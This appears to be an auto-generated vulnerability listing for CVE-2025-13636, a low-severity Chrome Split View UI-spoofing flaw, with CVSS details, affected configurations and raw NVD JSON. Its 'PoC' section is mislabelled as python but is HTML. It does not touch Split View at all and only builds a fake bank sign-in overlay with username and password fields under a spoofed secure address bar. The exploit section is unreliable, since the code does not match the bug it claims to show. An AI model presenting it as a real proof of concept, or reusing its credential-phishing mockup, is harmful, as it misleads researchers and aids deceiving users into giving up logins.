Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-13636 CVSS 4.3 MEDIUM

CVE-2025-13636

Published: 2025-12-02 19:15:48
Last Modified: 2025-12-04 19:42:36
Source: [email protected]

Description

Inappropriate implementation in Split View in Google Chrome prior to 143.0.7499.41 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted domain name. (Chromium security severity: Low)

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 143.0.7499.41

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-13636 PoC - Split View UI Spoofing // This PoC demonstrates the UI spoofing vulnerability in Chrome's Split View // Note: This is for educational purposes only <!DOCTYPE html> <html> <head> <title>CVE-2025-13636 UI Spoofing Demo</title> <style> body { font-family: Arial, sans-serif; padding: 20px; } .spoofed-ui { position: fixed; top: 50px; left: 50%; transform: translateX(-50%); background: #fff; border: 1px solid #ccc; border-radius: 8px; padding: 20px; box-shadow: 0 4px 6px rgba(0,0,0,0.1); z-index: 999999; } .fake-address-bar { background: #f1f3f4; padding: 10px; border-radius: 4px; font-family: monospace; margin-bottom: 15px; } .fake-button { background: #4285f4; color: white; border: none; padding: 10px 20px; border-radius: 4px; cursor: pointer; } .warning { background: #fef7e0; border-left: 4px solid #fbbc04; padding: 15px; margin: 20px 0; } </style> </head> <body> <h1>UI Spoofing Vulnerability Demo</h1> <p>Domain: <span id="domain"></span></p> <div class="spoofed-ui"> <div class="fake-address-bar"> πŸ”’ secure-bank.example.com </div> <p>Please verify your identity:</p> <input type="text" placeholder="Username" style="display:block; margin:10px 0; padding:8px; width:200px;"> <input type="password" placeholder="Password" style="display:block; margin:10px 0; padding:8px; width:200px;"> <button class="fake-button">Sign In</button> </div> <div class="warning"> <strong>Educational Warning:</strong> This PoC demonstrates how attackers can create fake UI elements that appear to be part of the browser's native interface. Always verify the actual URL in the address bar before entering credentials. </div> <script> document.getElementById('domain').textContent = window.location.hostname; // Simulate Split View detection if (window.innerWidth > 1000) { console.log('Split View mode detected'); } </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13636", "sourceIdentifier": "[email protected]", "published": "2025-12-02T19:15:48.260", "lastModified": "2025-12-04T19:42:35.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Split View in Google Chrome prior to 143.0.7499.41 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted domain name. (Chromium security severity: Low)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "143.0.7499.40", "matchCriteriaId": "28874374-C1B5-4638-BCCD-0AC4F1DAA6EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "143.0.7499.40", "matchCriteriaId": "28874374-C1B5-4638-BCCD-0AC4F1DAA6EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/446181124", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.